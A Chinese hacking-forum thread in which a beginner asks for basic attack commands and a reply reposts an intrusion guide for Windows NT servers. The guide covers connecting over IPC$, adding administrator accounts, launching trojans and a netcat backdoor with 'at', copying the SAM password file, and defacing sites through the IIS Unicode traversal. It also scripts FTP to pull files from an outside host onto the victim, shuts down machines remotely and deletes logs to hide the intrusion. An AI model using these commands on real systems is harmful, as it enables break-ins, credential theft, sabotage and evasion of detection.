论坛: 菜鸟乐园 标题: 最基本的命令?????????? 复制本贴地址    
作者: bcliangzi [bcliangzi]    论坛用户   登录
  你们好,我是一位刚进来的非常菜的菜鸟。我有几个问题想请问大家,请问各位大虾,网络攻击有那几个基础命令?分别怎么用?

地主 发表时间: 02/23 15:40
回复: playopy [playopy]   论坛用户   登录
转载
一、NET命令

1、例:net use \\192.168.0.1\ipc$ "123456789" /user:"tiannan"
注:以上命令是进行共享连接,当对方开放139端口并允许进行空连接的情况下可以连接。
解:192.168.0.1为连接的IP,IPC$为空连接(如果对方有开放共享盘的话,可对应开放的盘符),123456789为密码,tiannan为用户名。

2、例:net use \\192.168.0.1\ipc$ /delte
注:退出命令,前提是必须连接后才可以用以上命令。
解:相对你连接的方法,如你连接的是net use \\192.168.0.1\c$ "123456789" /user:"tiannan",退出的命令就是net use \\192.168.0.1\c$ /delte

3、例:net use z:\\192.168.0.1\c$
注:映射,把对方的盘映射到本地,能在我的电脑里像操作自己的盘一样。
解:z:为映射至本地的盘符,c$为对方共享的盘

4、例:net user hacker howareyou /add
注:创建用户,在对方机器中创建一个合法用户,如果创建成功,我们可以为用户增加权限。(见5)
解:hacker为密码,howareyou为密码

5、例:net localgroup Administrators hacker /add
注:把hacker用户加入Administrators组,因Administrators在NT中为超级用户,具有所有读写权限。
解:hacker为欲加入的用户,localgroup administratr为权限组

6、例:net user guest /active:yes
注:guest是个默认用户,在WIN2000系统是删不掉的,但可以禁用。
解:激活guest用户

7、例:net user guest howareyou
注:只要有足够的权限,你就可以更改用户的密码,以上是更改guest的密码
解:guest为用户,howareyou为密码

8、例:net start telnet
注: telnet是个很好的命令,非常实用,可以进行远程连接,一般情况下是要对其进行用户和密码验证的。
解: 开放对方TELNET服务

由于时间关系,暂时先写到这,我乃菜鸟一只,写得不好请不要见笑,希望本文对你有帮助。
AT
at命令
说明:在指定时间执行的规划命令
at命令的作用:当入侵了一部主机,为了方便下次进入,通常在系统中留下后门,但把后门上传至目标机上之后
要如何启动它呢?这时at命令就起作用了,这里假设你已经登录了目标机,并把后门G_server这个程序上传至目标
机上了,下面为大家演示一下:
先用 net time \\192.168.0.1 得到目标机的时间,结果显示如下:
Current time at \\192.168.0.1 is 5-2-2002 17:06
The command was completed successfully.
从以上得到的数据来看 5-2-2002 为日期, 17:06 时间,现在我们得到时间,接着需要建立一个新作业,其ID=1,也就是运行目标机上的后门程序,命令如下:
at \\192.168.0.1 17:20 G_server.exe 这里需要注意一下,我们得到的时间为17:06,那么at命令这里的时间应为17:06之后的时间,G_server.exe为木马冰河的服务端。

FTP命令
FTP命令相信大家不会陌生吧,很多操作系统都会使用到FTP这个命令。
当我们在dos输入ftp时会进入如下的状态:
ftp>
这里已经进行了ftp状态,我们可以输入“?”得到更多的帮助,下面简单介绍各个命令参数的作用。
!这个参数为执行交互shell环境,用exit回到ftp环境。
? 这个参数不用说了吧。如:? bell 可以显示bell的作用,同help
ascii  使用ascii文件传送方式,FTP支持两种文件传送方式,ascii和二进制,上传过网页的朋友应该清楚吧
binary 使用二进制文件传送方式,也可以用 bi
bell   声音提示,每一个文件上传完成后有声音提示,默认状态下是没有声音提示的。
bey    结束与远程机器的 ftp 会话,同时退出 ftp,也可以用by,同quit
cd     更改远程机器的工作目录,如dos下的cd内部命令。
delete 删除命令,和dos下的del一样。
dir    显示远程机器的目录列表和文件列表。
disconnect  断开与远程机器的连接,和bye不同的是,它并不退出 ftp 会话状态,同close命令,结合open命令
open   与远程机器建立连接。
mkdir  在远程机器上创建目录。
prompt 设置多个文件传输时的交互提示。
put  将本地上的文件传送到远程机器上,同send命令。
debug  设置调试方式, 显示发送到远程机器的每条命令。
ls   显示远程机器上的目录并把本地上的文件存入。
status 显示当前环境的状态。
append 将当前文件附加到远程机器中,如果没有指定远程机器上的文件名,则用当前的文件名。
mdelete 删除远程机器上的文件,同delete
pwd    显示远程机器上的当前目录。
trace 包跟踪。
type 设置传送文件方式,默认为ascii方式,设置如:type binary 这样就设置为二进制传送方式。
mdir  和dir差不多,不同的是它能指定多个远程文件。
get 下载远程机器上的文件至本地。
mget  能够把多个文件上载到远程机器。
user  登录验证,如:user anonymous anonymous@email 注:anonymous为匿名登录,后面为邮箱验证。
glob  和-g命令参数一样,设置文件命扩展,默认时为不使用扩展文件名。
recy  详细响应方式。
hash  每传输1024字节就显示一个“#”符号。
nlist  显示远程机器上目录的文件清单,并将其存入本地。
mls    和nlist差不多,不同的是它能指定多个文件。
mput   上载多个文件至远程机器。
rename  可以改变远程机器上的文件名,只要有读写权限。
lcd    将本地工作目录切换至dir。
rmdir  删除远程上的目录。 
1:NET 

只要你拥有某IP的用户名和密码,那就用IPC$做连接吧! 

这里我们假如你得到的用户是hbx,密码是123456。假设对方IP为127.0.0.1 

net use \\127.0.0.1\ipc$ "123456" /user:"hbx" 

退出的命令是 

net use \\127.0.0.1\ipc$ /delte 

下面的操作你必须登陆后才可以用.登陆的方法就在上面. 

---------------------- 

下面我们讲怎么创建一个用户,由于SA的权限相当于系统的超级用户. 

我们加一个heibai的用户密码为lovechina 

net user heibai lovechina /add 

只要显示命令成功,那么我们可以把他加入Administrator组了. 

net localgroup Administrators heibai /add 

---------------------- 

这里是讲映射对方的C盘,当然其他盘也可以,只要存在就行了.我们这里把对方的C盘映射到本地的Z盘. 

net use z:\\127.0.0.1\c$ 

---------------------- 

net start telnet 

这样可以打开对方的TELNET服务. 

---------------------- 

这里是将Guest用户激活,guest是NT的默认用户,而且无法删除呢?不知道是否这样,我的2000就是删除不了它。 

net user guest /active:yes 

---------------------- 

这里是把一个用户的密码改掉,我们把guest的密码改为lovechina,其他用户也可以的。只要有权限就行了呀! 

net user guest lovechina 

net命令果然强大啊! 

2:at 

一般一个入侵者入侵后都会留下后门,也就是种木马了,你把木马传了上去,怎么启动他呢? 

那么需要用AT命令,这里假设你已经登陆了那个服务器。 

你首先要得到对方的时间, 

net time \\127.0.0.1 

将会返回一个时间,这里假设时间为12:1,现在需要新建一个作业,其ID=1 

at \\127.0.0.1 12:3 nc.exe 

这里假设了一个木马,名为NC.EXE,这个东西要在对方服务器上. 

这里介绍一下NC,NC是NETCAT的简称,为了方便输入,一般会被改名.它是一个TELNET服务,端口为99. 

等到了12:3就可以连接到对方的99端口.这样就给对方种下了木马. 

3:telnet 

这个命令非常实用,它可以与远方做连接,不过正常下需要密码、用户,不过你给对方种了木马,直接
连到这个木马打开的端口. 

telnet 127.0.0.1 99 

这样就可以连到对方的99端口.那你就可以在对方运行命令了,这个也就是肉鸡. 

4:FTP 

它可以将你的东西传到对方机子上,你可以去申请个支持FTP上传的空间,国内多的是,如果真的找不
到,我给个WWW.51.NET,不错的.当我们申请完后,它会给用户名,密码,以及FTP服务器. 

在上传前需要登陆先,这里我们假设FTP服务器是WWW.51.NET,用户名是HUCJS,密码是654321 

ftp www.51.net 

他会要求输入用户,成功后会要求输入密码. 

---------------------- 

下面先说上传,假设你需上传的文件是INDEX.HTM,它位于C:\下,传到对方D:\ 

get c:\index.htm d:\ 

假设你要把对方C盘下的INDEX.HTM,下到你的机子的D盘下 

put c:\index.htm d:\ 

5:copy 

下面我说说怎样把本地的文件复制到对方硬盘上去,需要建立好IPC$连接才有效。 

这里我们把本地C盘下的index.htm复制到127.0.0.1的C盘下 

copy index.htm \\127.0.0.1\c$\index.htm 

---------------------- 

如果你要复制到D盘下把C改为D,就行了! 

copy index.htm \\127.0.0.1\d$\index.htm 

---------------------- 

如果你要把他复制到WINNT目录里 

就要把输入 

copy index.htm \\127.0.0.1\admin$\index.htm 

admin$是winnt 

---------------------- 

要把对方的文件复制过来,顺便告诉大家NT的备份的数据库放在x:\winnt\repair\sam._ sam._是数
据库的文件名 

下面就把127.0.0.1的数据库复制到本地C盘下 

copy \\127.0.0.1\admin$\repair\sam._ c:\ 

---------------------- 

6:set 

如果你跑进了一部机子,而且想黑他(这思想只能在特别时候才准有),当然他的80端口要开,不然
你黑给谁看。这时需要用SET命令! 

下面是我得到的结果!我来分析它,只是找主页在那而已。 

COMPUTERNAME=PENTIUMII 
ComSpec=D:\WINNT\system32\cmd.exe 
CONTENT_LENGTH=0 
GATEWAY_INTERFACE=CGI/1.1 
HTTP_ACCEPT=*/* 
HTTP_ACCEPT_LANGUAGE=zh-cn 
HTTP_CONNECTION=Keep-Alive 
HTTP_HOST=当前登陆者的IP,这里本来是显示我的IP,被我删除了 
HTTP_ACCEPT_ENCODING=gzip, deflate 
HTTP_USER_AGENT=Mozilla/4.0 (compatible; MSIE 5.0; Windows 98; DigExt) 
NUMBER_OF_PROCESSORS=1 
Os2LibPath=D:\WINNT\system32\os2\dll; 
OS=Windows_NT 
Path=D:\WINNT\system32;D:\WINNT 
PATHEXT=.COM;.EXE;.BAT;.CMD 
PATH_TRANSLATED=E:\vlroot主页放在的地址,只要你看到PATH_TRANSLATED=的后面就是主页的存放
地址。这里是E:\vlroot 
PROCESSOR_ARCHITECTURE=x86 
PROCESSOR_IDENTIFIER=x86 Family 6 Model 3 Stepping 3, GenuineIntel 
PROCESSOR_LEVEL=6 
PROCESSOR_REVISION=0303 
PROMPT=$P$G 
QUERY_STRING=/c+set 
REMOTE_ADDR=XX.XX.XX.XX 
REMOTE_HOST=XX.XX.XX.XX 
REQUEST_METHOD=GET 
SCRIPT_NAME=/scripts/..%2f../winnt/system32/cmd.exe 
SERVER_NAME=XX.XX.XX.XX 
SERVER_PORT=80 
SERVER_PORT_SECURE=0 
SERVER_PROTOCOL=HTTP/1.1 
SERVER_SOFTWARE=Microsoft-IIS/3.0对方使用IIS/3.0 
SystemDrive=D: 
SystemRoot=D:\WINNT 
TZ=GMT-9 
USERPROFILE=D:\WINNT\Profiles\Default User 
windir=D:\WINNT 

粉红色的那行就是对方主页存放地址,这里告诉大家一个技巧,很笨的技巧啊,不过只能用这个方法
才能100%的找到主页的名称,当你DIR这个目录时,一定会看到很多文件,你可以把所有文件在浏览器
这样输入XX.XX.XX.XX/文件名,这样只要看到和XX.XX.XX.XX看到的也面一模一样,那么这就是主页的名称了。 

7:nbtstat 

如果你扫到一部NT的机子,他的136到139其中一个端口开了的话,就要用这个命令得到用户了。顺便
告诉大家这是netbios,得到用户名后就可以猜猜密码了。例如比较简单的密码,密码和用户名一样
的,都试下,不行就暴力破解吧! 

现在网上很多NT的机子都开了这些端口的,你可以练习下,我们来分析得到的结果。 

命令是 

nbtstat -A XX.XX.XX.XX 

-A一定要大写哦。 

下面是得到的结果。 

NetBIOS Remote Machine Name Table 

Name Type Status 
--------------------------------------------- 
Registered Registered Registered Registered Registered Registered Registered Reg 
istered Registered Registered Registered 
MAC Address = 00-E0-29-14-35-BA 
PENTIUMII <00> UNIQUE 
PENTIUMII <20> UNIQUE 
ORAHOTOWN <00> GROUP 
ORAHOTOWN <1C> GROUP 
ORAHOTOWN <1B> UNIQUE 
PENTIUMII <03> UNIQUE 
INet~Services <1C> GROUP 
IS~PENTIUMII...<00> UNIQUE 
ORAHOTOWN <1E> GROUP 
ORAHOTOWN <1D> UNIQUE 
..__MSBROWSE__.<01> GROUP 


粉红色的就是登陆过这部系统的用户,可能你不知道怎么看,大家是不是看到了一窜数字,只
要这窜数字是<03>的话,那他前面的就是用户。 

这里的用户是PENTIUMII。 

8:Shutdown 

关了对方的NT服务器的命令 

Shutdown \\IP地址 t:20 

20秒后将NT自动关闭,三思后才能运行这个命令,这样对对方造很大的损失,要做个有良心的入侵者呀。 

9:DIR 

这个命令没什么好讲,但是却非常重要,他是查看一目录里的所有文件、文件夹。 

你可以本地试下。 

10:echo 

著名的漏洞Unicode,这个命令可以简单的黑一下有这个漏洞的主机。 

我们假设我们要把“南京大屠杀铁证如山,任何日本人不得抵赖!”写入index.htm,有2种方法,大家看
看有什么区别。 

echo 南京大屠杀铁证如山,任何日本人不得抵赖!>index.htm 

echo 南京大屠杀铁证如山,任何日本人不得抵赖!>>index.htm 

第一个的意思是覆盖index.htm原有的内容,把“南京大屠杀铁证如山,任何日本人不得抵赖!”
写进index.htm。 

第二个的意思是把“南京大屠杀铁证如山,任何日本人不得抵赖!”加到index.htm里面。 

“>>”产生的内容将追加进文件中,“>”则将原文件内容覆盖。 

大家可以本地试下。 

可能你会问,这样简单黑下有什么好玩的,其实他可以用来下载主页到对方的目录里。 

1、首先,我们需要申请一个免费的主页空间。 

2、用echo在可写目录下建立如下内容的txt文件:(以chinren服务器为例。) 
open upload.chinaren.com(你的FTP服务器,申请时你的空间提供商会给你的) 
cnhack(你申请时的用户名) 
test(你申请时的密码) 
get index.htm c:\inetpub\wwwroot\index.htm(这里是把你空间上的index.htm下载到对方的c:\inetpub\wwwroot\index.htm) 
bye(退出FTP对话,相当在98下的DOS,用EXIT退出DOS) 

具体的做法: 
输入 echo open upload.chinaren.com> c:\cnhack.txt 
输入 echo cnhack >> c:\cnhack.txt 
输入 echo 39abs >> c:\cnhack.txt 
输入 echo get index.htm c:\inetpub\wwwroot\index.htm+>>+c:\cnhack.txt 
最后输入 ftp -s:c:\cnhack.txt (利用ftp的-s参数,执行文件里的内容。) 

等命令完成时,文件已经下载到你指定的文件里了。 

注意:取得文件后,请删除cnhack.txt。(如果不删除,很容易会给别人看到你的密码。) 

记得要 del c:\cnhack.txt 

11:attrib 

这个命令是设置文件属性的。如果你想黑一个站,而他的主页的文件属性设置了只读,那就
很可怜呀,想删除他也不行,想覆盖他也不行。倒!不过有这个命令就别怕了。 

attrib -r index.htm 

这个命令是把index.htm的只读属性去掉。 

如果把“-”改为“+”则是把这个文件的属性设置为只读 

---------------------- 

attrib +r index.htm 

这个命令是把index.htm的属性设置为只读。 

12:del 

当你看到这个标题可别倒下啊!现在要离开127.0.0.1了,要删除日志,当然要删除日志啦!想被捉吗。呵呵。 

NT的日志有这些 

del C:\winnt\system32\logfiles\*.* 
del C:\winnt\ssytem32\config\*.evt 
del C:\winnt\system32\dtclog\*.* 
del C:\winnt\system32\*.log 
del C:\winnt\system32\*.txt 
del C:\winnt\*.txt 
del C:\winnt\*.log 

只要删除这些就可以了。有些系统NT安装在D盘或其他盘,就要把C改成其他盘。


B1层 发表时间: 02/24 12:50
回复: bcliangzi [bcliangzi]   论坛用户   登录
  无铭,你好,非常感谢你的回服,让我基本对网络的攻击有了一些基础了解。我能在QQ上把你加去吗?我的QQ:121532306  名字:独孤醉
  

B2层 发表时间: 03/02 10:42

论坛: 菜鸟乐园

20CN网络安全小组版权所有
Copyright © 2000-2010 20CN Security Group. All Rights Reserved.
论坛程序编写:NetDemon

粤ICP备05087286号